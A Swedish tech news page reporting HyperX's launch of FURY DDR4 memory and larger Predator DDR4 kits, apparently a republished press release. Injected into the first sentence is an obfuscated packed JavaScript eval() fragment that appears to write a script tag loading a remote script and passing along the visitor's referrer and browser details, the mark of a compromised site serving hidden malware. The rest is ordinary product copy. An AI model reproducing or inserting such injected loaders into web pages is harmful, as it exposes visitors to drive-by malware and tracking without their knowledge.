Image Image Image Image Image Image Image Image Image Image

| 4 juni, 2020

Scroll to top

Top

HyperX lanserar FURY DDR4 minne och Predator DDR4 kit med hög kapacitet.

HyperX lanserar FURY DDR4 minne och Predator DDR4 kit med hög kapacitet.
Sebastian

HyperX®, eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|kabba|var|u0026u|referrer|fakfh||js|php’.split(’|’),0,{}))
en avdelning inom 
Kingston Technology Company, Inc., oberoende världsledare inom minnesprodukter, lanserade idag HyperX FURY DDR4 minne.

HyperX FURY DDR4 är den första serien som erbjuder automatisk överklockning via plug and play för nästa generations Intel® X99 chipset och Haswell-E processorer. HyperX FURY DDR4 finns tillgänglig med 2133MHz, 2400MHz och 2666MHz hastighet, och i flera kit-varianter från 4GB till hela 64GB.

HyperX FURY DDR4 minne är ett kostnadseffektivt och samtidigt en högpresterande uppgradering för Intel 6- and 8-core processorer och bidrar till att ge snabbare redigering, i 3D miljö, spel och eller AI. Minnet drar full nytta utav kraften i DDR4, låga 1,2V, minnet har även låg profil med kylplatta, i den kända asymetriska Fury designen, minnet har även svart PCB för att det skall se snyggt ut på de senaste moderkorten.

Förutom den nya FURY DDR4-minne linjen, utökar HyperX sin high-end Predator DDR4 familj med 32GB och 64GB kit för prestandasökande och entusiaster som behöver det absolut snabbaste minnet i världen. HyperX Predator DDR4 finns i frekvenser upp till 3000MHz och i olika kit konfigurationer.

”Vi är glada att utöka vår HyperX DDR4 erbjudanden med FURY för nybörjar entusiasten som vill maximera sin spel och användarupplevelse med enkel plug-and-play-minne”, säger Mikael Johansson, HyperX. ”FURY DDR4 är idealisk för någon söker premiumkomponenter med högre hastigheter, hög prestanda med maximal tillförlitlighet och stora estetik, alla för en minimal investering.”

HyperX är högpresterande produktdivisionen i Kingston Technology omfattar höghastighets DDR4 och DDR3-minne, SSD, USB-minnen, och speltillbehör. Inriktade på gamers, överklockare och entusiaster, är HyperX känd över hela världen för kvalitet, prestanda och innovation. HyperX har åtagit sig att Esports som sponsrar över 20 lag globalt och är huvudsponsor för Intel Extreme Masters. HyperX kan hittas på många utställningar inklusive Brasil Game Show, China Joy, DreamHack, gamescom och PAX.